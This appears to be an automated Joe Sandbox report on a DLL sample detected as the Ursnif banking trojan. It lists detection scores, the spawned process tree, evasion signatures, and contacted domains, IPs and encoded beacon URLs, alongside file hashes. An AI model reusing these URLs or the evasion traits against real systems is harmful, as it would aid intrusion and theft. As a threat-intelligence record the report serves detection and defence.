Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Command and Control: Encrypted Channel 11, Ingress Tool Transfer 1, Non-Application Layer Protocol 2, Application Layer Protocol 3, Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol
Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points, Downgrade to Insecure Protocols
Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
Impact: Modify System Partition, Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Data Encrypted for Impact, Generate Fraudulent Advertising Revenue

                      Behavior Graph

Behavior Graph ID: 481107; Sample: qT9Qk5aKTk.dll; Startdate: 10/09/2021; Architecture: WINDOWS; Score: 96

Network nodes attached to the start node:
• 13.225.29.132, ports 49910, 49911, 80, AMAZON-02US, United States
• ocsp.sca1b.amazontrust.com (13.225.29.199), ports 49902, 49903, 49954, AMAZON-02US, United States
• 192.168.2.1, unknown

Signatures attached to the start node:
• Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
• Antivirus / Scanner detection for submitted sample
• Multi AV Scanner detection for submitted file
• 2 other signatures

Process nodes (indented under their parent):
• loaddll32.exe (1), started from the start node; signatures: Writes or reads registry keys via WMI; Writes registry values via WMI
  • cmd.exe (1), started
    • rundll32.exe, started; signatures: Found stalling execution ending in API Sleep call; Writes registry values via WMI
  • regsvr32.exe, started; signatures: Writes or reads registry keys via WMI; Writes registry values via WMI
  • iexplore.exe (1 101), started
    • iexplore.exe, started; contacts tls13.taboola.map.fastly.net (151.101.1.44), ports 443, 49816, 49817, FASTLYUS, United States; geolocation.onetrust.com (104.20.185.68), ports 443, 49767, 49768, CLOUDFLARENETUS, United States; 9 other IPs or domains
    • iexplore.exe, started; contacts 13.225.29.204, ports 49968, 49969, 80, AMAZON-02US, United States; ocsp.sca1b.amazontrust.com
    • iexplore.exe, started
    • iexplore.exe, started
  • 15 other processes


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

Source | Detection | Scanner | Label
qT9Qk5aKTk.dll | 81% | Virustotal |
qT9Qk5aKTk.dll | 59% | Metadefender |
qT9Qk5aKTk.dll | 82% | ReversingLabs | Win32.Trojan.Ursnif
qT9Qk5aKTk.dll | 100% | Avira | TR/AD.Ursnif.urvkx

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

Source | Detection | Scanner | Label
0.2.loaddll32.exe.ec0000.2.unpack | 100% | Avira | HEUR/AGEN.1108168
3.2.rundll32.exe.2f30000.2.unpack | 100% | Avira | HEUR/AGEN.1108168
0.2.loaddll32.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen8
31.2.rundll32.exe.46b0000.2.unpack | 100% | Avira | HEUR/AGEN.1108168
10.2.rundll32.exe.4b30000.1.unpack | 100% | Avira | HEUR/AGEN.1108168
2.2.regsvr32.exe.5e0000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen8
17.2.rundll32.exe.4f40000.1.unpack | 100% | Avira | HEUR/AGEN.1108168
33.2.rundll32.exe.e80000.1.unpack | 100% | Avira | HEUR/AGEN.1108168
2.2.regsvr32.exe.c80000.2.unpack | 100% | Avira | HEUR/AGEN.1108168
29.2.rundll32.exe.52d0000.1.unpack | 100% | Avira | HEUR/AGEN.1108168
3.2.rundll32.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen8
31.2.rundll32.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen8
12.2.rundll32.exe.5470000.1.unpack | 100% | Avira | HEUR/AGEN.1108168

                      Domains

                      No Antivirus matches

                      URLs

Source | Detection | Scanner | Label
http://ocsp.sca1b.amazontrust.com/images/SYju0gEPY/daXUIALH6wAr_2FEeL7Y/6GIgSGWYRYPOXzpvhXM/3guBTTFjN4dorGgaYOMkm4/M_2Bjjmvlz4ur/UEsZa_2B/wtLFrALI7COJAH4Q2eJxA3E/X6kgoUtw4W/_2FEmmXCN8gAZkdpR/hFpN7ViLd8Sb/HUuTC1Ynxdq/BFB70oLC0oipHY/frptiWELKhVA4yo7R_2Bx/tVP.avi | 0% | Avira URL Cloud | safe
http://ocsp.sca1b.amazontrust.com/images/nGZ4P_2FwoiJjdC/WbaZyFGl8u4o5V_2Bt/3MW1dlOE3/XNAi9tLxJCuE0YPRtZlT/uSBAv7K7l3rJyZ38tNQ/bWQ8urEO340TOAzpTLrfn1/g6N8UXuxX3Z6B/2PtIG78y/5FZLGxch4duFejHp2UCYdv6/DXApgqy328/SmC86X3WgjhyNBdkg/98vDKpf2NWlj/jd6j019UoWb/RKR_2BwuTm2z0Lvh4aKdTS/q.avi | 0% | Avira URL Cloud | safe
http://ocsp.sca1b.amazontrust.com/images/9sYl8HCwVTgVyQ/NT8tJmO80ConCL2bjdFpK/YmrgZEf9KiUxgNmM/mbsOKShkLL9xEyV/cqM19yrWFAKIfNZCre/1_2F2h8X8/jegaI0S3pTjU6iR1JpPX/UMhOIwx5PH6P2vnzG0z/rGk07QRgyLizPAe2h48XfS/OWkfSj0_2F4iO/h7HzpUkv/m1kaqwRRUSi9pYEVBNe2Vsg/k_2FWV7h/Of76U6bg46X/dpq.avi | 0% | Avira URL Cloud | safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F5f3d7819fc402dab11ff0cbe39c46367.jpg | 0% | Avira URL Cloud | safe
https://btloader.com/tag?o=6208086025961472&upapi=true | 0% | Avira URL Cloud | safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fimages.maennersache.de%2Fkunde-will-150-packungen-klopapier-umtauschen-john-paul-drake%2Cid%3D73f41081%2Cb%3Dmaennersache%2Cw%3D1600%2Crm%3Dsk.jpeg | 0% | Avira URL Cloud | safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fconsole.brax-cdn.com%2Fcreatives%2Fb9476698-227d-4478-b354-042472d9181c%2Fimages%2F824258cd-2488-4e7c-b171-dad87f56f610_1000x600.jpeg | 0% | Avira URL Cloud | safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F5c635ff03c0adc713f159b2abe690081.png | 0% | Avira URL Cloud | safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F6375ef5dcb44b841a2c82f366826a986.jpeg | 0% | Avira URL Cloud | safe
http://ocsp.sca1b.amazontrust.com/images/MouQH3qgSHj8rVq2CjdZ/guD6i2fAIsR0IrZ7zv_/2Fg884tCuKHo7vJx28ckOK/PeUsib7MohdVp/hsP2dh6G/LbOHfPo3POSkJrn8i6_2FAi/5MivSFUwCP/GbFXfy5Ss56TDN93M/Lmrkp1CfI0wl/UQ_2FNpOa3h/8j_2FJtcVth8pZ/xW1yFjsbSZ4ddCtjBXOBw/FadwJ_2F/5k0k.avi | 0% | Avira URL Cloud | safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Fc3cfcb8c707b14064f9cad58b478df43.jpg | 0% | Avira URL Cloud | safe

                      Domains and IPs

                      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
contextual.media.net | 2.18.160.23 | true | false | | high
tls13.taboola.map.fastly.net | 151.101.1.44 | true | false | | high
ocsp.sca1b.amazontrust.com | 13.225.29.199 | true | false | | high
hblg.media.net | 2.18.160.23 | true | false | | high
lg3.media.net | 2.18.160.23 | true | false | | high
btloader.com | 104.26.7.139 | true | false | | high
geolocation.onetrust.com | 104.20.185.68 | true | false | | high
web.vortex.data.msn.com | unknown | unknown | false | | high
www.msn.com | unknown | unknown | false | | high
srtb.msn.com | unknown | unknown | false | | high
img.img-taboola.com | unknown | unknown | false | | high
cvision.media.net | unknown | unknown | false | | high

                                              Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://ocsp.sca1b.amazontrust.com/images/SYju0gEPY/daXUIALH6wAr_2FEeL7Y/6GIgSGWYRYPOXzpvhXM/3guBTTFjN4dorGgaYOMkm4/M_2Bjjmvlz4ur/UEsZa_2B/wtLFrALI7COJAH4Q2eJxA3E/X6kgoUtw4W/_2FEmmXCN8gAZkdpR/hFpN7ViLd8Sb/HUuTC1Ynxdq/BFB70oLC0oipHY/frptiWELKhVA4yo7R_2Bx/tVP.avi | false | Avira URL Cloud: safe | unknown
https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location | false | | high
http://ocsp.sca1b.amazontrust.com/images/nGZ4P_2FwoiJjdC/WbaZyFGl8u4o5V_2Bt/3MW1dlOE3/XNAi9tLxJCuE0YPRtZlT/uSBAv7K7l3rJyZ38tNQ/bWQ8urEO340TOAzpTLrfn1/g6N8UXuxX3Z6B/2PtIG78y/5FZLGxch4duFejHp2UCYdv6/DXApgqy328/SmC86X3WgjhyNBdkg/98vDKpf2NWlj/jd6j019UoWb/RKR_2BwuTm2z0Lvh4aKdTS/q.avi | true | Avira URL Cloud: safe | unknown
http://ocsp.sca1b.amazontrust.com/images/9sYl8HCwVTgVyQ/NT8tJmO80ConCL2bjdFpK/YmrgZEf9KiUxgNmM/mbsOKShkLL9xEyV/cqM19yrWFAKIfNZCre/1_2F2h8X8/jegaI0S3pTjU6iR1JpPX/UMhOIwx5PH6P2vnzG0z/rGk07QRgyLizPAe2h48XfS/OWkfSj0_2F4iO/h7HzpUkv/m1kaqwRRUSi9pYEVBNe2Vsg/k_2FWV7h/Of76U6bg46X/dpq.avi | false | Avira URL Cloud: safe | unknown
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F5f3d7819fc402dab11ff0cbe39c46367.jpg | false | Avira URL Cloud: safe | unknown
https://btloader.com/tag?o=6208086025961472&upapi=true | false | Avira URL Cloud: safe | unknown
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fimages.maennersache.de%2Fkunde-will-150-packungen-klopapier-umtauschen-john-paul-drake%2Cid%3D73f41081%2Cb%3Dmaennersache%2Cw%3D1600%2Crm%3Dsk.jpeg | false | Avira URL Cloud: safe | unknown
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fconsole.brax-cdn.com%2Fcreatives%2Fb9476698-227d-4478-b354-042472d9181c%2Fimages%2F824258cd-2488-4e7c-b171-dad87f56f610_1000x600.jpeg | false | Avira URL Cloud: safe | unknown
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F5c635ff03c0adc713f159b2abe690081.png | false | Avira URL Cloud: safe | unknown
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F6375ef5dcb44b841a2c82f366826a986.jpeg | false | Avira URL Cloud: safe | unknown
http://ocsp.sca1b.amazontrust.com/images/MouQH3qgSHj8rVq2CjdZ/guD6i2fAIsR0IrZ7zv_/2Fg884tCuKHo7vJx28ckOK/PeUsib7MohdVp/hsP2dh6G/LbOHfPo3POSkJrn8i6_2FAi/5MivSFUwCP/GbFXfy5Ss56TDN93M/Lmrkp1CfI0wl/UQ_2FNpOa3h/8j_2FJtcVth8pZ/xW1yFjsbSZ4ddCtjBXOBw/FadwJ_2F/5k0k.avi | false | Avira URL Cloud: safe | unknown
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Fc3cfcb8c707b14064f9cad58b478df43.jpg | false | Avira URL Cloud: safe | unknown

                                                Contacted IPs


                                                Public

IP | Domain | Country | ASN | ASN Name | Malicious
13.225.29.132 | unknown | United States | 16509 | AMAZON-02US | false
13.225.29.199 | ocsp.sca1b.amazontrust.com | United States | 16509 | AMAZON-02US | false
151.101.1.44 | tls13.taboola.map.fastly.net | United States | 54113 | FASTLYUS | false
104.26.7.139 | btloader.com | United States | 13335 | CLOUDFLARENETUS | false
104.20.185.68 | geolocation.onetrust.com | United States | 13335 | CLOUDFLARENETUS | false
13.225.29.204 | unknown | United States | 16509 | AMAZON-02US | true

                                                Private

IP: 192.168.2.1

                                                General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 481107
Start date: 10.09.2021
Start time: 11:27:12
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 15m 26s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: qT9Qk5aKTk.dll
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Run with higher sleep bypass
Number of new started processes analysed: 49
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal96.troj.evad.winDLL@64/163@14/7
EGA Information:
• Successful, ratio: 35.3%
HDC Information:
• Successful, ratio: 75.2% (good quality ratio 69.7%)
• Quality average: 76.5%
• Quality standard deviation: 31.2%
HCA Information:
• Successful, ratio: 79%
• Number of executed functions: 181
• Number of non-executed functions: 199
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Sleeps bigger than 120000ms are automatically reduced to 1000ms
• Found application associated with file extension: .dll
Warnings:
                                                • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, ielowutil.exe, SgrmBroker.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
                                                • Excluded IPs from analysis (whitelisted): 23.203.80.193, 204.79.197.203, 204.79.197.200, 13.107.21.200, 80.67.82.209, 80.67.82.240, 65.55.44.109, 23.211.4.86, 2.18.160.23, 20.82.210.154, 152.199.19.161, 20.199.120.182, 20.199.120.85, 80.67.82.235, 80.67.82.211, 40.112.88.60, 20.54.110.249
                                                • Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, wns.notify.trafficmanager.net, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, www.bing.com, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ie9comview.vo.msecnd.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, a-0003.a-msedge.net, cvision.media.net.edgekey.net, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, www-msn-com.a-0003.a-msedge.net, a1999.dscg2.akamai.net, web.vortex.data.trafficmanager.net, e607.d.akamaiedge.net, web.vortex.data.microsoft.com, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, go.microsoft.com.edgekey.net, static-global-s-msn-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, cs9.wpc.v0cdn.net
• Execution Graph export aborted for target rundll32.exe, PID 1268 because there are no executed functions
• Execution Graph export aborted for target rundll32.exe, PID 2200 because there are no executed functions
• Execution Graph export aborted for target rundll32.exe, PID 4504 because there are no executed functions
• Execution Graph export aborted for target rundll32.exe, PID 4620 because there are no executed functions
• Execution Graph export aborted for target rundll32.exe, PID 572 because there are no executed functions
• Execution Graph export aborted for target rundll32.exe, PID 5852 because it is empty
• Execution Graph export aborted for target rundll32.exe, PID 6272 because there are no executed functions
• Execution Graph export aborted for target rundll32.exe, PID 6284 because there are no executed functions
• Execution Graph export aborted for target rundll32.exe, PID 6812 because there are no executed functions
• Execution Graph export aborted for target rundll32.exe, PID 7040 because there are no executed functions
• Execution Graph export aborted for target rundll32.exe, PID 768 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
                                                • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                • Report size getting too big, too many NtSetInformationFile calls found.

                                                Simulations

                                                Behavior and APIs

Time | Type | Description
11:28:31 | API Interceptor | 4x Sleep call for process: rundll32.exe modified
11:28:47 | API Interceptor | 1x Sleep call for process: regsvr32.exe modified
11:29:33 | API Interceptor | 1x Sleep call for process: loaddll32.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                No context

                                                Domains

                                                No context

                                                ASN

                                                No context

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\DURNCK2N\www.msn[2].xml
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):13
                                                Entropy (8bit):2.469670487371862
                                                Encrypted:false
                                                SSDEEP:3:D90aKb:JFKb
                                                MD5:C1DDEA3EF6BBEF3E7060A1A9AD89E4C5
                                                SHA1:35E3224FCBD3E1AF306F2B6A2C6BBEA9B0867966
                                                SHA-256:B71E4D17274636B97179BA2D97C742735B6510EB54F22893D3A2DAFF2CEB28DB
                                                SHA-512:6BE8CEC7C862AFAE5B37AA32DC5BB45912881A3276606DA41BF808A4EF92C318B355E616BF45A257B995520D72B7C08752C0BE445DCEADE5CF79F73480910FED
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: <root></root>
                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\QALADACS\contextual.media[1].xml
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:ASCII text, with very long lines, with no line terminators
                                                Category:dropped
                                                Size (bytes):3138
                                                Entropy (8bit):4.888614068856011
                                                Encrypted:false
                                                SSDEEP:96:xHHHYYyYY/YPPAAAfmAfm4AfYaoaAfYaoaAfYaoaAfYaoaAfYaoaAfYaoaC:sbwbwbwbwbwb9
                                                MD5:CFCCDA8AC311B8CE01C8A9441B112B73
                                                SHA1:5BDCD03F197E1F24694A6FCF86A9898FA7750770
                                                SHA-256:DB5F323043990284F46423C01E8429FBE5D4FDA0D3D5D28306A58B8F6D0FFF72
                                                SHA-512:E63C248727381554450CC29AB0714821ADE625DEB764E4CB8A697328168B98EF912421D5D7C0A6F19FEB70036ABB87FA9DB9F84F75D45A521ACDFE176DBB988A
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: <root></root><root><item name="HBCM_BIDS" value="{}" ltime="2710205760" htime="30910065" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2710205760" htime="30910065" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2710205760" htime="30910065" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2710205760" htime="30910065" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2710725760" htime="30910065" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2710725760" htime="30910065" /><item name="mntest" value="mntest" ltime="2710725760" htime="30910065" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2710725760" htime="30910065" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2710725760" htime="30910065" /><item name="mntest" value="mntest" ltime="2713725760" htime="30910065" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2710725760" htime="30910065" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2718205760" htime="30910065"
                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{DAC6F608-1264-11EC-90E5-ECF4BB570DC9}.dat
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:Microsoft Word Document
                                                Category:dropped
                                                Size (bytes):296008
                                                Entropy (8bit):2.5037486162156104
                                                Encrypted:false
                                                SSDEEP:1536:9zdMF6XK6Oc3fbXg+9UcGnvcGP+cGmvcGo+cGogcGeFcGyO/GPjWGTi38WjnJWjb:J0
                                                MD5:231EC8099E85002D67348167DE714EA5
                                                SHA1:EB7519FC839FF80F96C7463E65F0B55ADAD82FA0
                                                SHA-256:37E490A1F748A6148BABE11B6FB646C764757825BB465A999B202D81FFA3E898
                                                SHA-512:CE777CDC5BA6212CA94EB6C8B1DAA41EF0657132E68D794AF9E37BA1B69675FDC50EF628FF2C0C2FF95AB67EB8DDB937220E9187B1BD9E03F0768DAD8EE3D2AC
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: (binary OLE compound document; the only readable text in the preview is the stream name "Root Entry")
                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{076F5B62-1265-11EC-90E5-ECF4BB570DC9}.dat
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:Microsoft Word Document
                                                Category:dropped
                                                Size (bytes):19032
                                                Entropy (8bit):1.5977867449096077
                                                Encrypted:false
                                                SSDEEP:48:Iw3GcpraGwpamG4pQ2GrapbSSGQpBOGHHpc3TGUpQA8Gcpm:r9ZCQW64BS6jd2B69g
                                                MD5:E39371B263D40222CB8C7DE0B31AD051
                                                SHA1:D93EBEEFA948AB246EB9ADF571A17EB364F08279
                                                SHA-256:94A3220C626A05F13FC0665DFAF87D5386B44904992CF69A63641BA311CF0015
                                                SHA-512:7BAA0A92BB4BF9720E0BD7639272CB909E5B843DF38BBC9FB03E68A7BEF6852F94C2EB5678A3782584C599CB01FE4224F1931AA99FB616B675E5AA4943C3E583
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: (binary OLE compound document; the only readable text in the preview is the stream name "Root Entry")
                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{076F5B64-1265-11EC-90E5-ECF4BB570DC9}.dat
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:Microsoft Word Document
                                                Category:dropped
                                                Size (bytes):19032
                                                Entropy (8bit):1.598293055303183
                                                Encrypted:false
                                                SSDEEP:48:IwjhGcprcGwpaUhG4pQsGrapbSiGQpBmJtGHHpcmD6TGUpQmgpGcpm:rjXZUQUz6qBSqj12V6Zg
                                                MD5:5D11AD3A7201B43E41525F6896FBF926
                                                SHA1:C7CDB43F741201FDEBB833099BFF8EF189DAB609
                                                SHA-256:C542F69A0BDF09C75FAF25B67C89FA0A2E9ABEC823059CF8F162F1343C6167A6
                                                SHA-512:6000CAF7126FC9E79ADC6706B08CC1E95CE8CA7D0B208321D11B267B3B28A55065C25E3DBDBC756B95D11BE12F20ED6300701030F30CD607AE172E8FE52D5041
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: (binary OLE compound document; the only readable text in the preview is the stream name "Root Entry")
                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{0E8F68A2-1265-11EC-90E5-ECF4BB570DC9}.dat
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:Microsoft Word Document
                                                Category:dropped
                                                Size (bytes):27440
                                                Entropy (8bit):1.8671435729814179
                                                Encrypted:false
                                                SSDEEP:192:rsZrQn6JkYjZ2pWUMQ6VaMfxixVaMfxraqA:rsE6aaoYB3bfMbf0
                                                MD5:FD8E0DE629076D9DA76C48C0E84667B8
                                                SHA1:28B2E380BC44EBF18EF854F861797D0B1487AFF4
                                                SHA-256:FB39703A2DD64EED876636759F70AE69A07CDBBFF458C341EF739BFA1C56AED0
                                                SHA-512:D89427EAC9C63EBD4B3C9C247EE5F305C7E9C4B1CDC12CC2309BCCB75320467B0CB592BA8794815E912A6DF70AA1450660F438124BC9FC09B751AA191BE17A27
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: (binary OLE compound document; the only readable text in the preview is the stream name "Root Entry")
                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{151808E6-1265-11EC-90E5-ECF4BB570DC9}.dat
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:Microsoft Word Document
                                                Category:dropped
                                                Size (bytes):19032
                                                Entropy (8bit):1.5968160088475212
                                                Encrypted:false
                                                SSDEEP:48:IwTGcprSGwpaCG4pQWGrapbShGQpBSGHHpcjTGUpQQiGcpm:rpZaQy6YBSbjp2963g
                                                MD5:C1F0A186B1A7ADE0C910735B8D68E882
                                                SHA1:9356083234713F03EC78580F10B01D050184F7ED
                                                SHA-256:9630985C894A6002FCAA800082603214E17C8394F822A20C31E8080956E08BF2
                                                SHA-512:61F027181149C62CE5381FB09711DD7164C61852F70C35314070B2E7436E7EDDF5851DDCAE90F761BEDB7292EF8A76CDFA807BEF5E227733E4A4B9F811BDF5BF
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: (binary OLE compound document; the only readable text in the preview is the stream name "Root Entry")
                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{23EFE27C-1265-11EC-90E5-ECF4BB570DC9}.dat
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:Microsoft Word Document
                                                Category:modified
                                                Size (bytes):19032
                                                Entropy (8bit):1.597992830495361
                                                Encrypted:false
                                                SSDEEP:48:IwSGcprjGwpa50G4pQnmGrapbSquGQpBCy6GHHpcCgNTGUpQC/6Gcpm:rmZ9Qa6oBSqmjCyB2CgP6COg
                                                MD5:2EFDCCE8EB07B401729B576B48DE39E7
                                                SHA1:277073E7DB5B9155AFF6FEC63C11BA4348426E3C
                                                SHA-256:36FAE8174ADDB0CF62C238514E0952CB33BE8BEA15C06F6970F6FB48B7A66826
                                                SHA-512:D958342DE6A40E1BAEBE549850169DD2C46A4886C28A1B8D3CAD7DA6AFC4877EB085E9E61479084DB14E99A10C89EE242D44A293BE8F2ADBDA349E1185FA2351
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: (binary OLE compound document; the only readable text in the preview is the stream name "Root Entry")
                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{DAC6F60A-1264-11EC-90E5-ECF4BB570DC9}.dat
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:Microsoft Word Document
                                                Category:dropped
                                                Size (bytes):198318
                                                Entropy (8bit):3.58429359179131
                                                Encrypted:false
                                                SSDEEP:3072:9Z/2Bfcdmu5kgTzGtLZ/2Bfc+mu5kgTzGtu:kIf
                                                MD5:361933F3665EE5C0406FE843330895A5
                                                SHA1:6A5D7038AC7E59FCA0D3A38EED059091EBA20709
                                                SHA-256:F4D15BB8C9B7275E7FEAEB866BCD317E68F1F9DFA612E2AC27095818817CC647
                                                SHA-512:A1EEAE17D1F56EA120C6334D349F7496E2DEE16A70F7E3112A5DB945AF1C7D6DD1D8D50539D9675CF326C1E9F282092AB12EB64CA2876FB0A89AEB7A86FA02D7
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: (binary OLE compound document; the only readable text in the preview is the stream name "Root Entry")
                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{E1E23B56-1264-11EC-90E5-ECF4BB570DC9}.dat
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:Microsoft Word Document
                                                Category:dropped
                                                Size (bytes):19032
                                                Entropy (8bit):1.5836752086615293
                                                Encrypted:false
                                                SSDEEP:48:IwPGcprKGwpa3G4pQfGrapbSBGQpK/G7HpRecTGIpX29GApm:rFZSQ56jBS7AOTXFcg
                                                MD5:A06F23434238FAC16C854BC853569D20
